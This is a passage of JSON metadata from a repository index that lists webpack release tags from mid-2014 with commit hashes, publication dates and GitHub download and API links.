beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"